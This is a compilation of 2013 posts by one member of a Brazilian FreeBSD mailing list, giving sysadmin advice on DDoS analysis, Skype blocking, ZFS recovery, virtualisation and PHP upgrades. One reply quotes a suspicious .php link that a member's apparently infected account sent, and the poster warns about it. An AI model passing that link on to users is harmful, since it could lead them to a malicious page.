[Welkson Renny de Medeiros]

Em 20 de agosto de 2013 22:12, Leonardo Augusto escreveu:

> Tem no proprio site do face tudo que eles usam.
>
> google => "facebook infra structure"
>
> Achei muito ruim o video... a pagina que fala da infra da uma visão
> muito melhor.
> Lá fala que a salvação foi o memcache.. e o bigtable.. dentre outros...
> O hip-hop, compilador de php para C...
> Esses detalhes que permitem esse absurdo de read/write..
>
> Claro, ficaria melhor se fosse em cima do freebsd :) (é linux que eles
> usam ?)
>
>

Facebook usa BigTable? certeza?

BigTable é o NoSQL da Google.

Provavelmente eles usam Cassandra.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [1/2OFF] MacOS e compatibilidade binária com Linux

[Welkson Renny de Medeiros]

Em 14 de agosto de 2013 17:49, Pablo Sánchez  escreveu:

> Caros,
>
> Como todos sabem, o MacOS (Darwin) é oriundo do FreeBSD lá na versão
> 3.0. Nessa época o Free já tinha compatibilidade binária com Linux,
> instalando o port linux_base. Até hoje isso funciona no FreeBSD de boa (e
> muitas vezes até com certo ganho de performance).
>
> A minha dúvida é: alguém sabe se tal compatibilidade binária foi mantida
> pela Apple? Basicamente é porque eu preciso executar uma ferramenta que só
> tem binário para Linux e Windows e não quero fazer isso usando VMs, acho um
> saco, além de pesado desnecessariamente.
>
> E então? Alguém? Hein? Hein?
>
>
MacOS usa Mach-O, e não ELF...

Fiz algumas pesquisas, talvez ajude:
http://osxbook.com/software/xbinary/

http://stackoverflow.com/questions/2574912/possiblity-of-loading-executing-elf-files-on-osx
http://stackoverflow.com/questions/9439436/is-a-linux-executable-compatible-with-os-x
http://unix.stackexchange.com/questions/7874/binary-compatibility-between-mac-os-x-and-linux

Apesar do Mac ser baseado em Darwin, aparentemente não tem a
compatibilidade binária com Linux como o FreeBSD tem. Foi o que entendi
lendo os links.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Current em produção

[Welkson Renny de Medeiros]

Em 9 de agosto de 2013 11:43, Marcelo Gondim escreveu:

> Opa Loos e pessoal,
>
> Valeu pela resposta mas a minha pergunta foi mais por curiosidade mesmo.
>  :)
> Mas seria bom saber se caso precisasse de algo que tivesse somente no
> current, eu pudesse aproveitar pra algo não crítico.
>
> Grande abraço à todos,
> Gondim
>
>
Gondim, fugindo um pouco da thread...

E aquele problema do PPPOE? Voltou para o Linux?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [1/2 OFF] PostgreSQL no FreeBSD ao invés de Linux

[Welkson Renny de Medeiros]

Em 9 de agosto de 2013 08:09, Juliano Atanazio escreveu:

> Em 8 de agosto de 2013 17:48, Danilo Egea  >escreveu:
>
> Então, Danilo.
>
> A intenção do meu post não foi somente em termos de performance que estou
> preocupado do PostgreSQL no FreeBSD, mas também saber
> o que o FreeBSD pode me oferecer de vantajoso para manter o PostgreSQL
> nele.
>
>

É um pouco antigo, mas talvez ajude:
http://freebsdfoundation.blogspot.com.br/2010/06/freebsd-and-postgresql.html

Realmente o ZFS faz uma diferença enorme (veja o primeiro gráfico e compare
com os demais):
http://www.unix-experience.fr/2013/2451/

Pelo que lembro alguns dos desenvolvedores do PG usam FreeBSD (não achei
referências, mas acho que já comentaram isso por aqui)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Ferramenta para análise de DDoS

[Welkson Renny de Medeiros]

Em 28 de julho de 2013 12:36, Welkson Renny de Medeiros
escreveu:

> Verdade Gondim.
>
> Administro poucos servidores FreeBSD, e mesmo assim fico assustado quando
> rodo um "portaudit" e surge vários pacotes com vulnerabilidades... se o
> camarada brincar a galera entra mesmo.
>
> Um outro dado alarmanete é a quantidade de smartphones comprometidos...
> muita gente baixa .apk ou .ipa (android e iphone respectivamente) no
> 4shared e instala sem saber a procedência. Imagina um monte de smartphone
> usando 4G sendo infectado e participando de botnet?
>
> Complicado...
>
> Welkson
>

Onde tem "alarmanete" leia "alarmante"  =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Ferramenta para análise de DDoS

[Welkson Renny de Medeiros]

Em 27 de julho de 2013 20:32, Marcelo Gondim escreveu:

> Grande Welkson,
>
> Então, o objetivo é fazer um levantamento rápido pra tentar ver junto à
> minha fornecedora de link. Tive um problema menor que esse um tempo
> atrás e consegui resolver tirando o IP de destino do ar. Esse que tive
> nessa madruga foi um ataque de 2Gbps onde meus 2 links ficaram cheios.  :(
> O que me deixa puto com essas coisas é saber que tem muito servidor aí
> comprometido por falta de cuidado dos sysadmins. Você ser invadido é uma
> coisa mas não detectar o problema posteriormente, deixando o servidor
> servir de agente zumbi são outros quinhentos. Será que o cara não olha
> em nenhum momento o gráfico de consumo dele mensal? Todo Datacenter te
> dá isso. Alguns montam o servidor e largam à bangu.
> Se todos fizessem a sua parte a coisa poderia ser um pouco melhor. :)
>
> Vou olhar os links que você passou e também estou aqui na procura.
> Obrigadão!
>
>

Verdade Gondim.

Administro poucos servidores FreeBSD, e mesmo assim fico assustado quando
rodo um "portaudit" e surge vários pacotes com vulnerabilidades... se o
camarada brincar a galera entra mesmo.

Um outro dado alarmanete é a quantidade de smartphones comprometidos...
muita gente baixa .apk ou .ipa (android e iphone respectivamente) no
4shared e instala sem saber a procedência. Imagina um monte de smartphone
usando 4G sendo infectado e participando de botnet?

Complicado...

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Ferramenta para análise de DDoS

[Welkson Renny de Medeiros]

Em 27 de julho de 2013 13:37, Marcelo Gondim escreveu:

> Pessoal,
>
> Estou procurando alguma ferramenta para que me facilite analisar um
> ataque DDoS que esteja passando pelo meu router FreeBSD, me permitindo
> identificar as origens e destino do ataque. Sei que é complicado
> garantir a origem do ataque mas qualquer coisa já ajuda. Porque se não
> for pela origem vai pelo destino mesmo.  ;)
> Hoje tenho feito isso com jnettop e tcpdump mas se existir alguma ou
> algumas outras ferramentas seria interessante.  :)
>
> []'s
> Gondim
>


Mestre Gondim, nunca passei por isso, mas pelo que sei não adianta bloquear
no firewall, afinal o pacote vai ocupar o meio físico e comprometer a
banda... mas fiquei curioso quanto a análise do ataque, fiz algumas
pesquisas, encontrei essa ferramenta:

http://nfsen.sourceforge.net

Screenshots:
http://nfsen.sourceforge.net/#mozTocId301830

Já pensou em usar CloudFlare?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF] - Morte do Pedro Madsen

[Welkson Renny de Medeiros]

Em 17 de julho de 2013 16:41, Paulo Henrique - BSDs Brasil <
paulo.rd...@bsd.com.br> escreveu:

> Em 17/07/2013 15:56, mantunes escreveu:
> > Deve ter sido selecionado por irado para trabalhar com ele..
> >
> > Que fique em paz..
>


RIP!

O Irado tinha uma certa idade, mas o Madsen, se for esse da foto [1],
aparentava ser bastante jovem.

[1] https://twitter.com/MadsenPedro

Descanse em paz!

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] the nuOS project - a whole NEW FreeBSD distro, NOT a fork

[Welkson Renny de Medeiros]

Viram essa?

Não seria mais fácil contribuir com o projeto FreeBSD em vez de criar uma
nova variante?

Welkson

.

The nuOS project ( http://nuos.org ) is about bringing back the power to
the people! Currently, technical software, hardware and networking power.
Ultimately, the power of personal communication and community
self-organization. Currently made by geeks/nerds/hackers for
geeks/nerds/hackers, our intent is to create an entirely new software
ecosystem that promotes quality, easy to use software that is for
any-and-every man woman and child yet without lassoing us all into one herd
of sheeple. ;) Simple, common things should always be EASY. Complex,
amazing or never-before imagined things should always be POSSIBLE.

We have a live image for download from our site. (Fully functional at 189
MB, just cat or dd to your 4 GB or larger usb drive or select it as a
flat-file virtual disk in your hypervisor of choice. It is not an ISO and
nuOS does not work well from optical media.) Or grab our source (currently
hosted by GitHub at
https://github.com/**CropCircleSys/nuOS
)
and build the entire system from any FreeBSD 9.1 system with one simple yet
deeply customizable command. (We only build/test on amd64 and would like
that to change in the future.)

It is my belief that our software is PRODUCTION READY with our new beta
release. It might just be the answer to the management headaches you may be
having. Take the plunge tonight and find yourself breezing through your
day-job with "nu"-found ease tomorrow morning. If you're the comfortable
yet cautious type, watch the discussion for a week or two first instead.
Either way, we intend to cause a positive large and lasting motion in the
FreeBSD community.

I hope you will give nuOS a look and offer your assessments and ask any
questions you have. Please tear it and us apart in discussion with the goal
of a better FreeBSD for us all! Documentation is one area that is sorely
lacking though it is mostly because Scott and I consider most of our code
clear enough to have been pretty self-documenting [for our purposes we've
had until now]. It is our hope that with the community's help we will bring
more and more of this platform to the high standard of quality that FreeBSD
is known for. We aren't trying to create our own new garden. We offer this
code with hopes that it, in part or in whole, might be some day included in
canonical FreeBSD releases.

We have NO intention on forking FreeBSD and are instead developing a very
lightweight suite of tools which hopefully capture and collect modern best
practices while providing a testing and proving ground for advanced FreeBSD
features. We want to bring computing to more people, bring more computer
users to open source, bring more high-value and responsible open-source
users to FreeBSD and bring more current FreeBSD users guidance and
enlightenment regarding advanced features in the face of FreeBSD's typical
adherence to maximal backward compatibility, legacy support and solid
ground yet sometimes daunting array of intimately detailed configuration
choices.

We do not seek to limit those choices or to shift the ground beneath
current FreeBSD users' feet. We seek to offer an alternative flavor of
default system for those interested in taking a step back from their
current perspective in order to take a giant flying leap forward. This
doesn't mean giving up anything in terms of compatibility or
configurabilty, quite the contrary. Throughout our evolution, we seek to
always maintain the environment that FreeBSD users have come to know and
love while reducing the issues that sometimes irk them. We simply seek to
provide a better way to structure, provision and maintain production
systems and development processes.

Outline of features:

Extends plain old FreeBSD 9.1 (RELEASE or STABLE) and maintains total
compatibility
We seek to remain nimble
Expect a production-ready seal of approval to lag behind releases by no
more than a week or two
and prebuilt images and packages
e.g. releases like 9.2 and 10.0, et al
Someone should be able to build it and use all applicable
features on 8.4 with ease
we simply haven't the time or inclination to even try
Default full ZFS filesystem layout, completely legacy-free
Boot from ZFS, boot to ZFS
If you'd like use all 100.0% of all your drives for one large zpool
Use one large zpool for all of your
filesystems
block volumes
alternate boot environments, including one called "rescue"
which is included
NO partitions, not some tiny /, not even a /boot
Just ZFS datasets in their infinite flexibility
/etc is now a ZFS dataset of its own
How did we do it?
Decades of conventional wisdom says /etc must be on /.
Check it out, discuss the whys and the trade-offs.
nu_jail - provision al

Re: [FUG-BR] Como Bloquear Skype

[Welkson Renny de Medeiros]

Em 6 de julho de 2013 15:23, Vinícius Zavam escreveu:

> algo contra snort/suricata?
>  uma pagina da universidade de columbia reune alguns
> documentos/artigos/slides interessantes; vale a pena "perder um tempo"
> lendo para ajustar a solucao no teu cenario.
>
> --
> Vinícius Zavam
> profiles.google.com/egypcio
>
>

Usei muito tempo atrás o Snort + OSSEC com Active Response... recente fiz
alguns testes com o Suricata. Poste o link dessa páigna que comentou
(Google não ajudou muito :p  ).

Acho bem difícil detectar algum padrão no tráfego do Skype (as regras que
encontrei são bem antigas):
http://www.md3v.com/block-skype-with-snort
http://www.carbonwind.net/Firewalls/BlockingSkypewithPfsenseandSnort/BlockingSkypewithPfsenseandSnort.htm

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Como Bloquear Skype

[Welkson Renny de Medeiros]

Em 5 de julho de 2013 13:42, Rogério Moura  escreveu:

>
> Eu fiz isso uma vez usando o squid
> Segue um exemplo:
>
> http://www.htmlstaff.org/ver.php?id=23808
>
> Lembrando que para isso funcionar, não pode ser com proxy transparente, seu
> firewall deve bloquear acesso direro a Internet na porta 80 e 443 forçando
> assim passar pelo squid
>
>

Fiz isso em alguns clientes que usam pfSense... bloqueei todas as portas, e
deixei o acesso somente via proxy, e no proxy bloqueei tudo, liberando
apenas domínios governamentais... dessa forma você bloqueia o Skype (como
também Tor, etc.)... o problema é que isso gera MUITO trabalho para o TI
rsrs... por exemplo, em um supermercado onde o setor de compras precisa
acessar diversos sites de fornecedores, fazer buscas no Google, etc...
enfim, em alguns ambientes é inviável.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Como Bloquear Skype

[Welkson Renny de Medeiros]

2013/7/5 Luciano Bissoli 

> Alguem chegou em alguma solução para o bloqueio do skype??
>
>

Luciano, bom dia!

Mesmo usando L7 é difícil bloquear, é tudo criptografado, veja:
http://l7-filter.sourceforge.net/protocols

Poderia indicar o ipfw-classifyd que é baseado no iptables-l7 (usa as
mesmas regras), mas de acordo com o link acima mesmo o iptables-l7 (Linux)
não consegue bloquear o skype.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Off-Topic] - Compatibilidade do Freebsd em Servidores Dell PowerEdge

[Welkson Renny de Medeiros]

Em 25 de junho de 2013 15:18, Eng Eder de Souza escreveu:

> Ola lista !
>
> O pessoal da lista tem usado o FreeBSD sem grandes problemas em servidores
> Dell PowerEdge ?
>
> Estou enfrentando alguns problemas com um R720, a controladora de rede
> BCM5720 insiste em dar "watchdog timeout -- resetting error", estou usando
> o FreeBSD 9.1, compilei alguns drivers do fabricante para Freebsd, mas
> ainda  sem efeito :-(.
>
> Estou tentando recompilar o kernel para a versão stable e ver se o problema
> some, não estou com muita esperança que isso resolva ...
>
> Uma outra duvida, alguém usa HBA QLogic 2560 no FreeBSD 9.1 ?
>
> Agradeço se alguém tiver dicas !
>
>
> Eder
>


Bom dia Eder.

Tenho alguns T410 e T300, e quando fui instalar o FreeBSD acabei abortando
por não ter como rodar o sistema de gerenciamento da Dell (OpenManage eu
acho). Acabei optando por instalar o ESXi (tem um bundle do sistema de
gerenciamento fornecido pela Dell) e deixar o BSD como guest. Roda muito
bem. Logicamente tenho alguma perda de desempenho por causa da camada de
virtualização, mas a facilidade de manutenção acaba compensando (tipo, faço
backup das máquinas virtuais, e quando necessário posso mover para outro
hardware).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC]Como ter garantia de ser respondido sobre dúvidas de BSD?

[Welkson Renny de Medeiros]

Em 22 de junho de 2013 11:38, Jorge Luis Carvalho Santos <
jorgeassembl...@outlook.com> escreveu:

> Eric Raimond diz no guia Como fazer perguntas inteligentes, no título
> Antes de perguntar, "Nunca assuma que você merece uma resposta. Você não
> merece; você não está, afinal de contas, pagando por este serviço. Você irá
> ganhar uma resposta, se ganhar, fazendo perguntas substanciais,
> interessantes e intrigantes - uma que contribua com a experiência da
> comunidade ao invés de apenas extrair conhecimentos dos outros."
> Se o usuário não ganhar a resposta ou se as comunidades de BSD, por
> exemplo, a lista e o fórum FUG-BR estiverem paradas,  a quem se deve pagar
> para ter garantia de ser respondido sobre dúvida de BSD?
> Para mim será frustrante fazer o FreeBSD Server e System Administration da
> FreeBSD Brasil se depois de fazer esse curso não ganhar resposta de
> comunidade BSD ou se as comunidades de BSD estiverem paradas, pois não sei
> inglês para ser ajudado pela freebsd.org.
>
>

Essa foi boa rsrsrsrs

Não quero gerar flame war, até porque também uso Linux para alguns serviços
em específico, mas as listas de discussão de Linux aqui no Brasil são muito
mais paradas que essa (geralmente só rola spam =)   (se bem que de parada
essa lista não tem nada)

Jorge, por favor, não me entenda mal, qual seu objetivo nessa lista? desde
que entrou só vejo perguntas "não técnicas" que sempre termina em confusão.

Em nenhuma lista de discussão de software livre há garantia de resposta!
Não sei de onde tirou isso!

Mas se quer PAGAR pra ter suporte profissional de FreeBSD, fale com Patrick
que a FreeBSD Brasil fornece esse tipo de serviço.

Lembrei da piada de um amigo: "o povo quer ir para o céu mas não quer
morrer" k

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Timeout SSH

[Welkson Renny de Medeiros]

Em 20 de junho de 2013 02:42, Rodrigo Gonçalves Crescencio <
rodr...@rcsolucoesinteligentes.com.br> escreveu:

> Pessoal bom dia !
>
>
>
> Estou tentando configurar o timeout do SSH, porem o mesmo não está atuando,
> no sshd_config foram descomentadas e configuradas as linhas abaixo:
>
>
>
> #ClientAliveInterval 15
>
> #ClientAliveCountMax 3
>
>

Acredito que esse parâmetro não detecta inatividade.

Veja se isso ajuda:
http://www.dicas-l.com.br/arquivo/variavel_tmout.php#.UcLznD5gZvY
http://forums.freebsd.org/showthread.php?t=6171

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 18 de junho de 2013 07:20, Welkson Renny de Medeiros
escreveu:

>
> Com FreeBSD não, mas tenho com Linux CentOS (servidor de homologação de
> aplicações Java).
>
> Welkson
>


Voltando ao Xen + BSD, a BSD Magazine desse mês tem um artigo sobre o
assunto:
http://bsdmag.org/magazine/1842-freebsd-on-rails

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 18 de junho de 2013 03:33, Paulo Henrique escreveu:

> E alguem ai usa VirtualBox ?
>
> Não me aprofundei muito, mais estou a transferir 11 maquinas virtuais de
> servidores e em 3 anos nunca tive problemas.
> O Ambiente é FreeBSD como hospedeiro de 6 maquinas Win7, 3 Win Server 2K3 e
> 2 WinXP
> Não utilizou redundância ainda, para isso dois novos servidores estão a
> caminho.
>
>
> --
> :=)><(=:
> Rip NoRm4nD.
> Flamers > /dev/null !!!
>
>

Com FreeBSD não, mas tenho com Linux CentOS (servidor de homologação de
aplicações Java).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 17 de junho de 2013 14:04, Adiel de Lima Ribeiro <
adiel.netad...@gmail.com> escreveu:

> Não sei se é hack, mas em nosso plano, tinhamos a opção de servidores
>  FreeBSD, na página deles tem a opção.
> https://aws.amazon.com/marketplace/pp/B00AA25MLK
>
> --
> att,
> Adiel de Lima Ribeiro
>
>

FreeBSD (64-bit "cluster compute")
Sold by: Colin Percival  <--

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 17 de junho de 2013 12:13, Adiel de Lima Ribeiro <
adiel.netad...@gmail.com> escreveu:

> Welkson, bom dia.
>  Roda sim, inclusive o Amazon até oferece servidores FreeBSD, e a
> plataforma que eles utilizam é o XEN, falando nisso, mais 2 gigantes que
> o utilizam, Google e NASA.
> Eu não me lembro bem, mas parece que o XEN ficou abandonado uns tempos
> atrás, mas agora está a todo o vapor.
> Aqui na página do projeto XEN, existem alguns casos de sucesso para quem
> se interessar:
> http://www.xenproject.org/users/success-stories.html
>
> --
> att,
> Adiel de Lima Ribeiro
>
>


Amazon oferece FreeBSD? tem mais detalhes?

Pelo que vi, trata-se do port que o Perciva vem trabalhando:
http://www.daemonology.net/freebsd-on-ec2/

Mas acredito que isso não é suportado oficialmente pela Amazon (é um
"hack").

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 17 de junho de 2013 10:20, Adiel de Lima Ribeiro <
adiel.netad...@gmail.com> escreveu:

> O post está ficando interessante.
>  Eu não falei que Vmware é ruim, pelo contrário, é uma ótima ferramenta
> de virtualização. Apesar de a escolha da ferramenta não depender
> unicamente de nós do TI, eu acredito que seja desperdício de
> conhecimento e $$$ utilizarmos o Vmware, sendo que podemos utilizar o
> Xen.
> --
> att,
> Adiel de Lima Ribeiro
>


Adiel, bom dia!

O FreeBSD roda bem como guest no Xen? (desempenho, estabilidade, etc.)

Como host eu sei que tem uma galera trabalhando (mas ainda não tá 100%):
http://blog.xen.org/index.php/2012/09/12/freebsd-xen-support-a-quick-status-update/

O VMWare atende bem, mas sempre tive vontade de montar pelo menos um dos
servidores com Xen (Amazon e outras gigantes usam), mas na época que
iniciei a implantação dos servidores virtualizados (uns 3 anos atrás), o
Xen não me parecia uma boa solução pra FreeBSD (faz tempo, não lembro
exatamente o motivo).

Mas enfim, pretendo dar uma estudada no Xen. Eu acredito que é até mais
tranquilo para integrar com o OpenStack (que também pretendo estudar mais a
fundo).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 14 de junho de 2013 18:47, Renato Frederick
escreveu:

> Não é flame war, apenas acho importante postar na lista que o vmware
> funciona OK com BSD, senão daqui a pouco vai ter gerente de TI que joga
> no google sobre isto, vai ver na lista e falar: Não vamos usar BSD no
> vmware porque é ruim.
>
>
> Escala depois para 3 máquinas, faz um cluster com load balance + um NAS
> fiber ou iscsi, que aí vamos entender que é preciso solução de mercado.
>
>

Verdade Renato.

Uso FreeBSD 9.1 amd64 (com ZFS) no ESXi 5.1 a 6 meses e até agora nenhum
problema (Dell T410 com RAID 1 usando discos SAS 15K RPM).

Pra fechar o pacote é só usar o Veeam para fazer backup das VM's.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Como Bloquear Skype

[Welkson Renny de Medeiros]

Em 14 de junho de 2013 07:12, Tiago Ribeiro  escreveu:

> Em 13/06/13 16:34, Luiz Gustavo S. Costa escreveu:
> > On Thu, 13 Jun 2013 16:27:32 -0300 (BRT)
>
> Luiz, bom dia, durante esta semana pesquisando como bloquear o facebook
> via iptables, achei
> um comando bem interessante:
>
> whois -h whois.radb.net '!gAS32934'
>
> No Linux (centOS) me retorna os ranges, da mesma forma que você mostrou
> no site, só que via
> linha de comando, e depois é só jogar nas regras, até ai tudo bem.
>
> 1- Eu entendi o que o comando faz, mais confesso que não compreendi o
> parametro "!g"
> 2- Tentei rodar no FreeBSD e não rolou, alguém ai tem alguma dica pra
> rodar esta consulta no FreeBSD?
>



Aqui rolou tranquilo:

root@fw / % whois -h whois.radb.net '!gAS32934'
A939
204.15.20.0/22 69.63.176.0/20 66.220.144.0/20 66.220.144.0/21 69.63.184.0/21
69.63.176.0/21 74.119.76.0/22 69.171.255.0/24 173.252.64.0/18
69.171.224.0/19 69.171.224.0/20 103.4.96.0/22 69.63.176.0/24 173.252.64.0/19
173.252.70.0/24 31.13.64.0/18 31.13.24.0/21 66.220.152.0/21 66.220.159.0/24
69.171.239.0/24 69.171.240.0/20 31.13.64.0/19 31.13.64.0/24 31.13.65.0/24
31.13.67.0/24 31.13.68.0/24 31.13.69.0/24 31.13.70.0/24 31.13.71.0/24
31.13.72.0/24 31.13.73.0/24 31.13.74.0/24 31.13.75.0/24 31.13.76.0/24
31.13.77.0/24 31.13.96.0/19 31.13.66.0/24 173.252.96.0/19 69.63.178.0/24
31.13.78.0/24 31.13.79.0/24 31.13.80.0/24 31.13.82.0/24 31.13.83.0/24
31.13.84.0/24 31.13.85.0/24 31.13.86.0/24 31.13.87.0/24 31.13.88.0/24
31.13.89.0/24 31.13.90.0/24 31.13.91.0/24 31.13.92.0/24 31.13.93.0/24
31.13.94.0/24 31.13.95.0/24 69.171.253.0/24 69.63.186.0/24 204.15.20.0/22
69.63.176.0/20 69.63.176.0/21 69.63.184.0/21 66.220.144.0/20 69.63.176.0/20

root@fw / % uname -a
FreeBSD fw.intranet.xxx.com.br 9.1-RELEASE FreeBSD 9.1-RELEASE #2: Wed Dec
26 14:07:24 UTC 2012 r...@fw.intranet.xxx.com.br:/usr/obj/usr/src/sys/XXX
amd64

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Livro FreeBSD - O poder dos servidores em suas mãos

[Welkson Renny de Medeiros]

Em 14 de junho de 2013 13:34, mateus schott escreveu:

> Muito obrigado pelo retorno pessoal! Vou entrar em contato com a editora.
>
>
>

Recomendo o livro! Comprei assim que foi lançado.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] acessa hd com ZFS.

[Welkson Renny de Medeiros]

Em 29 de maio de 2013 18:34, Alessandro de Souza Rocha <
etherlin...@gmail.com> escreveu:

> Bom galera o seguinte tinha montando um servidor FreeBSD 9.0 com zfs e
> samba servidor de arquivos, so que a placa mae do danado queimou a placa e
> antiga nao conseguir uma igual, coloquei o hd em outra maquina tentar
> recupar os arquivos so que nao estou conseguindo montar alguma dica pois
> sao 600gb de arquivos.
>
> --
> Alessandro de Souza Rocha
> Administrador de Redes e Sistemas
> FreeBSD-BR User #117
>


Fala Alessandro, beleza?

Cara, eu não sou nenhum expert em ZFS  (inclusive você me ajudou bastante
na implantação via GTalk no início desse ano =)

Alguns dias após a implantação do ZFS eu dei um vacilo no loader.conf e o
sistema deixou de bootar. Depois de muito Google eu consegui resolver e fiz
um pequeno how-to, espero que ajude:

1- boot com o CD do FreeBSD, escolha a opção "LiveCD" (só aparece essa
pergunta na 2 ou 3 tela);
2- Ao chegar no login, informe o usuário "root", e o sistema irá acessar
sem senha;
3- Tente montar o pool ZFS da seguinte forma:
zpool set bootfs=zroot zroot
zfs set checksum=fletcher4 zroot
 zfs set mountpoint=/mnt zroot
4- Se tudo correr bem, na pasta /mnt estará seu sistema de arquivos, basta
editar o /mnt/boot/loader.conf;
5- Antes de rebootar desmonta o pool ZFS digitando:
zfs umount -a

Faz bastante tempo que usei isso, então não lembro muitos detalhes.

Abraço,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Hardware to virtualization.

[Welkson Renny de Medeiros]

Em 20 de maio de 2013 16:26, Elias Motta
escreveu:

> Boa tarde Lista,
>
> Dias atras os colegas trocaram ideia a respeito de hardware pra
> virtualização ESXi, alguns sugeriram motherboard Supermicro que vai bem com
> FreeBSD. Gostaria de sugestão de onde comprar essa marca aqui no brasil.
>
> Obs. sou do RS.
>
>
> Elias Motta
> TI - Engemolde
> 3597.2033 | 3597.8802
> t...@engemoldeengenharia.com.br




Dell funciona muito bem com ESXi (até mesmo os modelos mais básicos como
T300, T4xx, etc.).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd:

[Welkson Renny de Medeiros]

2013/4/16 Julio Cesar 

> http://www.bekcanmetal.com.tr/7iffuj.php
>
>
Bom dia!

Verifica seu pc Júlio, acho que está infectado.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [off-topic] php 5.4

[Welkson Renny de Medeiros]

Em 10 de maio de 2013 15:43, Marcelo Gondim escreveu:

> Pessoal,
>
> Desculpem o off-topic novamente mas estou procurando alguma explicação
> lógica pro seguinte e até agora não encontrei nada. :(
> Em um servidor estava rodando o php 5.3 e foi atualizado para o php 5.4.
> Algumas mudanças tiveram que ser feitas, logicamente.
> Mas tudo está funcionando e do nada sou deslogado do site, não consigo
> mais me logar. Dá uns erros doidos de chamada de função com nomes
> esquisitos tipo $%ˆ_() e nos logs não diz nada que ajude.
> Tudo o que faço pra voltar à funcionar é editar o arquivo de funções
> backend/functions.php e sem alterar nada saio salvando. Pronto, volta à
> funcionar por um tempo. Não vi lógica alguma nisso até agora, só sei que
> com o php 5.3 isso não estava ocorrendo. rsrsrs
>
> Carabina você já viu isso? Alguém aqui da lista que programe e use o php
> 5.4 já passou por isso?
>
> []'s
> Gondim



Gondim,

Pelo que vi, teve algumas mudanças significativas:
http://php.net/manual/en/migration54.incompatible.php
http://php.net/manual/pt_BR/migration54.php

Não tem como comentar muito sem conhecer o código da aplicação, mas
acredito que esses links possam ajudar.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD 9.0-RELEASE Congelando

[Welkson Renny de Medeiros]

Em 18 de abril de 2013 09:39, Bruno Oliveira  escreveu:

> Bom dia,
>
> Tenho uma servidor virtualizado com FreeBSD 9.0-RELEASE* e estou passando
> por um problema estranho. Todo dia entre 08:00 e 09:00 horas o servidor
> congela, reinicio e volta ao normal.
>
> No ambiente do ESXi não mostra nenhum overflow de CPU/Memória/Disco.
>
> Qual arquivo de registro tenho que analisar para tentar entender o que está
> acontecendo? Neste servidor tenho qmail, vpopmail, apache, mysql,
> roundcube, spamassasim e clamav.
>
